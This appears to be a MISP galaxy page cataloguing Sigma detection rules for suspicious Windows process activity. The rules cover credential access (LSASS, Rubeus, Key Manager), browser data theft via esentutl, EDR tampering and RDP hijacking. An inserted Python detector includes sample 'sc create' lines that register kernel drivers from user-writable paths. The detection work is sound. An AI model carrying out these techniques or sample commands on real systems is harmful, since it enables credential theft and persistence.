To see the related clusters, click here.
Esentutl Steals Browser Information
One way Qbot steals sensitive information is by extracting browser data from Internet Explorer and Microsoft Edge by using the built-in utility esentutl.exe
Internal MISP references
UUID 6a69f62d-ce75-4b57-8dce-6351eb55b362 which can be used as unique global reference for Esentutl Steals Browser Information in MISP communities and other software using the MISP galaxy
External references
- https://redcanary.com/threat-detection-report/threats/qbot/ - webarchive
- https://thedfirreport.com/2022/10/31/follina-exploit-leads-to-domain-compromise/ - webarchive
- https://thedfirreport.com/2022/02/07/qbot-likes-to-move-it-move-it/ - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_esentutl_webcache.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | frack113 |
| creation_date | 2022-02-13 |
| falsepositive | ['Legitimate use'] |
| filename | proc_creation_win_esentutl_webcache.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.collection', 'attack.t1005'] |
Related clusters
To see the related clusters, click here.
PUA - AdvancedRun Execution
Detects the execution of AdvancedRun utility
Internal MISP references
UUID d2b749ee-4225-417e-b20e-a8d2193cbb84 which can be used as unique global reference for PUA - AdvancedRun Execution in MISP communities and other software using the MISP galaxy
External references
- https://twitter.com/splinter_code/status/1483815103279603714 - webarchive
- https://www.elastic.co/security-labs/operation-bleeding-bear - webarchive
- https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/ - webarchive
- https://medium.com/s2wblog/analysis-of-destructive-malware-whispergate-targeting-ukraine-9d5d158f19f3 - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_advancedrun.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Florian Roth (Nextron Systems) |
| creation_date | 2022-01-20 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_pua_advancedrun.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.execution', 'attack.defense-evasion', 'attack.privilege-escalation', 'attack.t1564.003', 'attack.t1134.002', 'attack.t1059.003'] |
Related clusters
To see the related clusters, click here.
Potential DLL Injection Via AccCheckConsole
Detects the execution of "AccCheckConsole", a command-line tool for verifying the accessibility implementation of an application's UI. One of the tests that this checker can run is called a "verification routine", which tests for things like Consistency, Navigation, etc. The tool allows a user to provide a DLL that can contain a custom "verification routine". An attacker can build such a DLL and pass it via the CLI, after which it is loaded in the context of the "AccCheckConsole" utility.
Internal MISP references
UUID 0f6da907-5854-4be6-859a-e9958747b0aa which can be used as unique global reference for Potential DLL Injection Via AccCheckConsole in MISP communities and other software using the MISP galaxy
External references
- https://lolbas-project.github.io/lolbas/OtherMSBinaries/AccCheckConsole/ - webarchive
- https://twitter.com/bohops/status/1477717351017680899?s=12 - webarchive
- https://gist.github.com/bohops/2444129419c8acf837aedda5f0e7f340 - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_acccheckconsole_execution.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Florian Roth (Nextron Systems) |
| creation_date | 2022-01-06 |
| falsepositive | ['Legitimate use of the UI Accessibility Checker'] |
| filename | proc_creation_win_acccheckconsole_execution.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.execution', 'detection.threat-hunting'] |
LSASS Process Reconnaissance Via Findstr.EXE
Detects findstr commands that include the keyword lsass, which indicates recon activity for the LSASS process PID.
Internal MISP references
UUID fe63010f-8823-4864-a96b-a7b4a0f7b929 which can be used as unique global reference for LSASS Process Reconnaissance Via Findstr.EXE in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Florian Roth (Nextron Systems) |
| creation_date | 2022-08-12 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_findstr_lsass.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.credential-access', 'attack.t1552.006'] |
Related clusters
To see the related clusters, click here.
Suspicious Splwow64 Without Params
Detects suspicious Splwow64.exe process without any command line parameters
Internal MISP references
UUID 1f1a8509-2cbb-44f5-8751-8e1571518ce2 which can be used as unique global reference for Suspicious Splwow64 Without Params in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Florian Roth (Nextron Systems) |
| creation_date | 2021-08-23 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_splwow64_cli_anomaly.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1202'] |
Related clusters
To see the related clusters, click here.
Potential Arbitrary Command Execution Using Msdt.EXE
Detects processes leveraging the "ms-msdt" handler or the "msdt.exe" binary to execute arbitrary commands, as seen in the Follina (CVE-2022-30190) vulnerability.
Internal MISP references
UUID 258fc8ce-8352-443a-9120-8a11e4857fa5 which can be used as unique global reference for Potential Arbitrary Command Execution Using Msdt.EXE in MISP communities and other software using the MISP galaxy
External references
- https://app.any.run/tasks/713f05d2-fe78-4b9d-a744-f7c133e3fafb/ - webarchive
- https://twitter.com/nao_sec/status/1530196847679401984 - webarchive
- https://twitter.com/_JohnHammond/status/1531672601067675648 - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msdt_arbitrary_command_execution.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2022-05-29 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_msdt_arbitrary_command_execution.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1202'] |
Related clusters
To see the related clusters, click here.
Suspicious Key Manager Access
Detects the invocation of the Stored User Names and Passwords dialogue (Key Manager)
Internal MISP references
UUID a4694263-59a8-4608-a3a0-6f8d3a51664c which can be used as unique global reference for Suspicious Key Manager Access in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Florian Roth (Nextron Systems) |
| creation_date | 2022-04-21 |
| falsepositive | ['Administrative activity'] |
| filename | proc_creation_win_rundll32_keymgr.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.credential-access', 'attack.t1555.004'] |
Related clusters
To see the related clusters, click here.
Suspicious Velociraptor Child Process
Detects the suspicious use of the Velociraptor DFIR tool to execute other tools or download additional payloads, as seen in a campaign where it was abused for remote access and to stage further attacks.
Internal MISP references
UUID 4bc90587-e6ca-4b41-be0b-ed4d04e4ed0c which can be used as unique global reference for Suspicious Velociraptor Child Process in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Swachchhanda Shrawan Poudel (Nextron Systems) |
| creation_date | 2025-08-29 |
| falsepositive | ['Legitimate administrators or incident responders might use Velociraptor to execute scripts or tools. However, the combination of Velociraptor spawning these specific processes with these command lines is suspicious. Tuning may be required to exclude known administrative actions or specific scripts.'] |
| filename | proc_creation_win_susp_velociraptor_child_process.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.command-and-control', 'attack.persistence', 'attack.defense-evasion', 'attack.t1219'] |
Related clusters
To see the related clusters, click here.
HackTool - Rubeus Execution
Detects the execution of the hacktool Rubeus via PE information or command line parameters.
Internal MISP references
UUID 7ec2c172-dceb-4c10-92c9-87c1881b7e18 which can be used as unique global reference for HackTool - Rubeus Execution in MISP communities and other software using the MISP galaxy
External references
- https://blog.harmj0y.net/redteaming/from-kekeo-to-rubeus - webarchive
- https://m0chan.github.io/2019/07/31/How-To-Attack-Kerberos-101.html - webarchive
- https://github.com/GhostPack/Rubeus - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_rubeus.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Florian Roth (Nextron Systems) |
| creation_date | 2018-12-19 |
| falsepositive | ['Unlikely'] |
| filename | proc_creation_win_hktl_rubeus.yml |
| level | critical |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.credential-access', 'attack.t1003', 'attack.t1558.003', 'attack.lateral-movement', 'attack.t1550.003'] |
Related clusters
To see the related clusters, click here.
Uncommon System Information Discovery Via Wmic.EXE
Detects the use of the WMI command-line (WMIC) utility to identify and display various system information, including OS, CPU, GPU, and disk drive names; memory capacity; display resolution; and baseboard, BIOS, and GPU driver products/versions. Some of these commands were used by Aurora Stealer in late 2022/early 2023.
Internal MISP references
UUID 9d5a1274-922a-49d0-87f3-8c653483b909 which can be used as unique global reference for Uncommon System Information Discovery Via Wmic.EXE in MISP communities and other software using the MISP galaxy
External references
- https://app.any.run/tasks/a6aa0057-82ec-451f-8f99-55650ca537da/ - webarchive
- https://blog.cyble.com/2023/01/18/aurora-a-stealer-using-shapeshifting-tactics/ - webarchive
- https://blog.sekoia.io/aurora-a-rising-stealer-flying-under-the-radar - webarchive
- https://github.com/redcanaryco/atomic-red-team/blob/a2ccd19c37d0278b4ffa8583add3cf52060a5418/atomics/T1082/T1082.md#atomic-test-25---system-information-discovery-with-wmic - webarchive
- https://www.virustotal.com/gui/file/d6f6bc10ae0e634ed4301d584f61418cee18e5d58ad9af72f8aa552dc4aaeca3/behavior - webarchive
- https://nwgat.ninja/getting-system-information-with-wmic-on-windows/ - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_recon_system_info_uncommon.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | TropChaud |
| creation_date | 2023-01-26 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_wmic_recon_system_info_uncommon.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.discovery', 'attack.t1082'] |
Related clusters
To see the related clusters, click here.
Diskshadow Script Mode - Uncommon Script Extension Execution
Detects execution of "Diskshadow.exe" in script mode to execute a script with a potentially uncommon extension. Initial baselining of the allowed extension list is required.
Internal MISP references
UUID 1dde5376-a648-492e-9e54-4241dd9b0c7f which can be used as unique global reference for Diskshadow Script Mode - Uncommon Script Extension Execution in MISP communities and other software using the MISP galaxy
External references
- https://medium.com/@cyberjyot/lolbin-execution-via-diskshadow-f6ff681a27a4 - webarchive
- https://www.lifars.com/wp-content/uploads/2022/01/GriefRansomware_Whitepaper-2.pdf - webarchive
- https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/diskshadow - webarchive
- https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/ - webarchive
- https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration - webarchive
- https://www.zscaler.com/blogs/security-research/technical-analysis-crytox-ransomware - webarchive
- https://research.checkpoint.com/2022/evilplayout-attack-against-irans-state-broadcaster/ - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_diskshadow_script_mode_susp_ext.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2023-09-15 |
| falsepositive | ['False positives might occur with legitimate or uncommon extensions used internally. Initial baseline is required.'] |
| filename | proc_creation_win_diskshadow_script_mode_susp_ext.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1218'] |
Related clusters
To see the related clusters, click here.
Suspicious RDP Redirect Using TSCON
Detects a suspicious RDP session redirect using tscon.exe
Internal MISP references
UUID f72aa3e8-49f9-4c7d-bd74-f8ab84ff9bbb which can be used as unique global reference for Suspicious RDP Redirect Using TSCON in MISP communities and other software using the MISP galaxy
External references
- https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6 - webarchive
- https://www.hackingarticles.in/rdp-session-hijacking-with-tscon/ - webarchive
- http://www.korznikov.com/2017/03/0-day-or-feature-privilege-escalation.html - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_tscon_rdp_redirect.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Florian Roth (Nextron Systems) |
| creation_date | 2018-03-17 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_tscon_rdp_redirect.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.lateral-movement', 'attack.t1563.002', 'attack.t1021.001', 'car.2013-07-002'] |
Related clusters
To see the related clusters, click here.
Suspicious Redirection to Local Admin Share
Detects a suspicious output redirection to the local admin share; this technique is often found in malicious scripts or hacktool stagers.
Internal MISP references
UUID ab9e3b40-0c85-4ba1-aede-455d226fd124 which can be used as unique global reference for Suspicious Redirection to Local Admin Share in MISP communities and other software using the MISP galaxy
External references
- http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html - webarchive
- https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/ - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_redirect_local_admin_share.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Florian Roth (Nextron Systems) |
| creation_date | 2022-01-16 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_susp_redirect_local_admin_share.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.exfiltration', 'attack.t1048'] |
Related clusters
To see the related clusters, click here.
Rar Usage with Password and Compression Level
Detects the use of rar.exe, on the command line, to create an archive with password protection or with a specific compression level. This is pretty indicative of malicious actions.
Internal MISP references
UUID faa48cae-6b25-4f00-a094-08947fef582f which can be used as unique global reference for Rar Usage with Password and Compression Level in MISP communities and other software using the MISP galaxy
External references
- https://labs.sentinelone.com/the-anatomy-of-an-apt-attack-and-cobaltstrike-beacons-encoded-configuration/ - webarchive
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md - webarchive
- https://ss64.com/bash/rar.html - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rar_compression_with_password.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | @ROxPinTeddy |
| creation_date | 2020-05-12 |
| falsepositive | ['Legitimate use of Winrar command line version', 'Other command line tools, that use these flags'] |
| filename | proc_creation_win_rar_compression_with_password.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.collection', 'attack.t1560.001'] |
Related clusters
To see the related clusters, click here.
Add Windows Capability Via PowerShell Cmdlet
Detects usage of the "Add-WindowsCapability" cmdlet to add Windows capabilities. Notable capabilities could be "OpenSSH" and others.
Internal MISP references
UUID b36d01a3-ddaf-4804-be18-18a6247adfcd which can be used as unique global reference for Add Windows Capability Via PowerShell Cmdlet in MISP communities and other software using the MISP galaxy
External references
- https://www.virustotal.com/gui/file/af1c82237b6e5a3a7cdbad82cc498d298c67845d92971bada450023d1335e267/content - webarchive
- https://learn.microsoft.com/en-us/windows-server/administration/openssh/openssh_install_firstuse?tabs=powershell - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_add_windows_capability.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2023-01-22 |
| falsepositive | ['Legitimate usage of the capabilities by administrators or users. Add additional filters accordingly.'] |
| filename | proc_creation_win_powershell_add_windows_capability.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.execution'] |
Potential SPN Enumeration Via Setspn.EXE
Detects service principal name (SPN) enumeration used for Kerberoasting
Internal MISP references
UUID 1eeed653-dbc8-4187-ad0c-eeebb20e6599 which can be used as unique global reference for Potential SPN Enumeration Via Setspn.EXE in MISP communities and other software using the MISP galaxy
External references
- https://web.archive.org/web/20200329173843/https://p16.praetorian.com/blog/how-to-use-kerberoasting-t1208-for-privilege-escalation - webarchive
- https://www.praetorian.com/blog/how-to-use-kerberoasting-t1208-for-privilege-escalation/?edition=2019 - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_setspn_spn_enumeration.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Markus Neis, keepwatch |
| creation_date | 2018-11-14 |
| falsepositive | ['Administration activity'] |
| filename | proc_creation_win_setspn_spn_enumeration.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.credential-access', 'attack.t1558.003'] |
Related clusters
To see the related clusters, click here.
Suspicious Windows Update Agent Empty Cmdline
Detects suspicious Windows Update Agent activity in which a wuauclt.exe process command line doesn't contain any command line flags
Internal MISP references
UUID 52d097e2-063e-4c9c-8fbb-855c8948d135 which can be used as unique global reference for Suspicious Windows Update Agent Empty Cmdline in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Florian Roth (Nextron Systems) |
| creation_date | 2022-02-26 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_wuauclt_no_cli_flags_execution.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1036'] |
Related clusters
To see the related clusters, click here.
New Kernel Driver Via SC.EXE
Detects creation of a new service (kernel driver) with the type "kernel"
Internal MISP references
UUID 431a1fdb-4799-4f3b-91c3-a683b003fc49 which can be used as unique global reference for New Kernel Driver Via SC.EXE in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2022-07-14 |
| falsepositive | ['Rare legitimate installation of kernel drivers via sc.exe'] |
| filename | proc_creation_win_sc_new_kernel_driver.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.persistence', 'attack.privilege-escalation', 'attack.t1543.003'] |
Related clusters
To see the related clusters, click here.
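The rule above keys on the sc.exe command line, whose key= value syntax (the equals sign stays on the key and the value is the next token) is easy to get wrong with a plain substring match. The parser below is an added example written for this page; it is not the Sigma rule's own logic and not code from the MISP galaxy. It tokenises an sc.exe create request, picks out type= kernel, and runs over constructed sample command lines (service and driver names are invented).

```python
import ntpath
import shlex
from dataclasses import dataclass, field
from typing import Dict, List, Optional


@dataclass
class ScCreate:
    """One 'sc create' request: service name plus its key/value options."""
    service: str
    options: Dict[str, str] = field(default_factory=dict)

    @property
    def is_kernel_driver(self) -> bool:
        # sc.exe service types include own, share, interact, kernel and filesys;
        # only 'kernel' (SERVICE_KERNEL_DRIVER) loads code into the kernel.
        return self.options.get("type", "").lower() == "kernel"


def parse_sc_create(cmdline: str) -> Optional[ScCreate]:
    """Return the parsed 'create' request, or None if the line is not one.

    sc.exe's syntax is 'key= value': the '=' stays glued to the key and the
    value is the *next* token ('type= kernel'). The space-less form
    'type=kernel' is rejected by sc.exe, but it is parsed here too so that a
    clumsy attempt is still surfaced rather than silently dropped.
    """
    try:
        argv = shlex.split(cmdline, posix=False)  # keep Windows backslashes intact
    except ValueError:
        return None
    if not argv or ntpath.basename(argv[0].strip('"')).lower() not in ("sc", "sc.exe"):
        return None
    # An optional '\\server' may precede the verb, so locate the verb itself.
    verb_at = next((i for i, t in enumerate(argv) if t.lower() == "create"), None)
    if verb_at is None or verb_at + 1 >= len(argv):
        return None
    req = ScCreate(service=argv[verb_at + 1].strip('"'))
    i = verb_at + 2
    while i < len(argv):
        tok = argv[i]
        if tok.endswith("="):                       # 'type=' followed by 'kernel'
            key = tok[:-1]
            val = argv[i + 1] if i + 1 < len(argv) else ""
            i += 2
        elif "=" in tok:                            # 'type=kernel' (malformed)
            key, val = tok.split("=", 1)
            i += 1
        else:                                       # stray token, ignore it
            i += 1
            continue
        req.options[key.lower()] = val.strip('"')
    return req


def kernel_driver_creations(cmdlines: List[str]) -> List[ScCreate]:
    """The detection itself: every 'sc create' with type= kernel."""
    hits = []
    for line in cmdlines:
        req = parse_sc_create(line)
        if req is not None and req.is_kernel_driver:
            hits.append(req)
    return hits


# Constructed sample command lines (not real telemetry).
SAMPLE_CMDLINES = [
    r"sc create EvilDrv type= kernel binPath= C:\Users\Public\drv.sys start= demand",
    r'sc.exe create MySvc type= own binPath= "C:\Program Files\Svc\svc.exe"',
    r"sc.exe \\SRV01 create PrcDrv type= kernel start= auto binPath= C:\Windows\System32\drivers\prc.sys",
    r"sc query EvilDrv",
    r"C:\Windows\System32\sc.exe create Legit type=kernel binPath=C:\drv\legit.sys",
]

if __name__ == "__main__":
    for hit in kernel_driver_creations(SAMPLE_CMDLINES):
        print(f"kernel driver service {hit.service!r} -> {hit.options.get('binpath')}")
```

The parsed options are kept so that a production version can filter further, for instance on binPath= pointing outside C:\Windows\System32\drivers, or on the parent process, before raising the alert.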
Unmount Share Via Net.EXE
Detects when a mounted share is removed. Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation
Internal MISP references
UUID cb7c4a03-2871-43c0-9bbb-18bbdb079896 which can be used as unique global reference for Unmount Share Via Net.EXE in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | oscd.community, @redcanary, Zach Stanford @svch0st |
| creation_date | 2020-10-08 |
| falsepositive | ['Administrators or Power users may remove their shares via cmd line'] |
| filename | proc_creation_win_net_share_unmount.yml |
| level | low |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1070.005'] |
Related clusters
To see the related clusters, click here.
Console CodePage Lookup Via CHCP
Detects use of chcp to look up the system locale value as part of host discovery
Internal MISP references
UUID 7090adee-82e2-4269-bd59-80691e7c6338 which can be used as unique global reference for Console CodePage Lookup Via CHCP in MISP communities and other software using the MISP galaxy
External references
- https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/chcp - webarchive
- https://thedfirreport.com/2022/04/04/stolen-images-campaign-ends-in-conti-ransomware/ - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_chcp_codepage_lookup.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | _pete_0, TheDFIRReport |
| creation_date | 2022-02-21 |
| falsepositive | ["During Anaconda update the 'conda.exe' process will eventually execute the 'chcp' command.", 'Discord was seen using chcp to look up code pages'] |
| filename | proc_creation_win_chcp_codepage_lookup.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.discovery', 'attack.t1614.001'] |
Related clusters
To see the related clusters, click here.
HackTool - EDRSilencer Execution
Detects the execution of EDRSilencer, a tool that leverages Windows Filtering Platform (WFP) to block Endpoint Detection and Response (EDR) agents from reporting security events to the server based on PE metadata information.
Internal MISP references
UUID eb2d07d4-49cb-4523-801a-da002df36602 which can be used as unique global reference for HackTool - EDRSilencer Execution in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | @gott_cyber |
| creation_date | 2024-01-02 |
| falsepositive | ['Unlikely'] |
| filename | proc_creation_win_hktl_edrsilencer.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1562'] |
Related clusters
To see the related clusters, click here.
Self Extracting Package Creation Via Iexpress.EXE From Potentially Suspicious Location
Detects the use of iexpress.exe to create binaries via Self Extraction Directive (SED) files located in potentially suspicious locations. This behavior has been observed in-the-wild by different threat actors.
Internal MISP references
UUID b2b048b0-7857-4380-b0fb-d3f0ab820b71 which can be used as unique global reference for Self Extracting Package Creation Via Iexpress.EXE From Potentially Suspicious Location in MISP communities and other software using the MISP galaxy
External references
- https://strontic.github.io/xcyclopedia/library/iexpress.exe-D594B2A33EFAFD0EABF09E3FDC05FCEA.html - webarchive
- https://en.wikipedia.org/wiki/IExpress - webarchive
- https://decoded.avast.io/janvojtesek/raspberry-robins-roshtyak-a-little-lesson-in-trickery/ - webarchive
- https://www.virustotal.com/gui/file/602f4ae507fa8de57ada079adff25a6c2a899bd25cd092d0af7e62cdb619c93c/behavior - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_iexpress_susp_execution.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Joseliyo Sanchez, @Joseliyo_Jstnk, Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2024-02-05 |
| falsepositive | ['Administrators building packages using iexpress.exe'] |
| filename | proc_creation_win_iexpress_susp_execution.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1218'] |
Related clusters
To see the related clusters, click here.
RDP Connection Allowed Via Netsh.EXE
Detects usage of the netsh command to open and allow connections to port 3389 (RDP), as seen used by the Sarwent malware
Internal MISP references
UUID 01aeb693-138d-49d2-9403-c4f52d7d3d62 which can be used as unique global reference for RDP Connection Allowed Via Netsh.EXE in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Sander Wiebing |
| creation_date | 2020-05-23 |
| falsepositive | ['Legitimate administration activity'] |
| filename | proc_creation_win_netsh_fw_allow_rdp.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1562.004'] |
Related clusters
To see the related clusters, click here.
HTML Help HH.EXE Suspicious Child Process
Detects a suspicious child process of Microsoft HTML Help (HH.exe)
Internal MISP references
UUID 52cad028-0ff0-4854-8f67-d25dfcbc78b4 which can be used as unique global reference for HTML Help HH.EXE Suspicious Child Process in MISP communities and other software using the MISP galaxy
External references
- https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/chm-badness-delivers-a-banking-trojan/ - webarchive
- https://www.zscaler.com/blogs/security-research/unintentional-leak-glimpse-attack-vectors-apt37 - webarchive
- https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-27939090904026cc396b0b629c8e4314acd6f5dac40a676edbc87f4567b47eb7 - webarchive
- https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/ - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hh_html_help_susp_child_process.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Maxim Pavlunin, Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2020-04-01 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_hh_html_help_susp_child_process.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.execution', 'attack.initial-access', 'attack.t1047', 'attack.t1059.001', 'attack.t1059.003', 'attack.t1059.005', 'attack.t1059.007', 'attack.t1218', 'attack.t1218.001', 'attack.t1218.010', 'attack.t1218.011', 'attack.t1566', 'attack.t1566.001'] |
Related clusters
To see the related clusters, click here.
Computer Discovery And Export Via Get-ADComputer Cmdlet
Detects usage of the Get-ADComputer cmdlet to collect computer information and output it to a file
Internal MISP references
UUID 435e10e4-992a-4281-96f3-38b11106adde which can be used as unique global reference for Computer Discovery And Export Via Get-ADComputer Cmdlet in MISP communities and other software using the MISP galaxy
External references
- https://www.cisa.gov/uscert/sites/default/files/publications/aa22-320a_joint_csa_iranian_government-sponsored_apt_actors_compromise_federal%20network_deploy_crypto%20miner_credential_harvester.pdf - webarchive
- http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html - webarchive
- https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/ - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_computer_discovery_get_adcomputer.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2022-11-10 |
| falsepositive | ["Legitimate admin scripts may use the same technique, it's better to exclude specific computers or users who execute these commands or scripts often"] |
| filename | proc_creation_win_powershell_computer_discovery_get_adcomputer.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.discovery', 'attack.t1033'] |
Related clusters
To see the related clusters, click here.
Suspicious MSHTA Child Process
Detects a suspicious process spawning from an "mshta.exe" process, which could be indicative of a malicious HTA script execution
Internal MISP references
UUID 03cc0c25-389f-4bf8-b48d-11878079f1ca which can be used as unique global reference for Suspicious MSHTA Child Process in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Michael Haag |
| creation_date | 2019-01-16 |
| falsepositive | ['Printer software / driver installations', 'HP software'] |
| filename | proc_creation_win_mshta_susp_child_processes.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1218.005', 'car.2013-02-003', 'car.2013-03-001', 'car.2014-04-003'] |
Related clusters
To see the related clusters, click here.
Potential DLL Sideloading Via DeviceEnroller.EXE
Detects the use of the PhoneDeepLink parameter to potentially sideload a DLL file that does not exist. This non-existent DLL file is named "ShellChromeAPI.dll". Adversaries can drop their own renamed DLL and execute it via DeviceEnroller.exe using this parameter
Internal MISP references
UUID e173ad47-4388-4012-ae62-bd13f71c18a8 which can be used as unique global reference for Potential DLL Sideloading Via DeviceEnroller.EXE in MISP communities and other software using the MISP galaxy
External references
- https://strontic.github.io/xcyclopedia/library/DeviceEnroller.exe-24BEF0D6B0ECED36BB41831759FDE18D.html - webarchive
- https://mobile.twitter.com/0gtweet/status/1564131230941122561 - webarchive
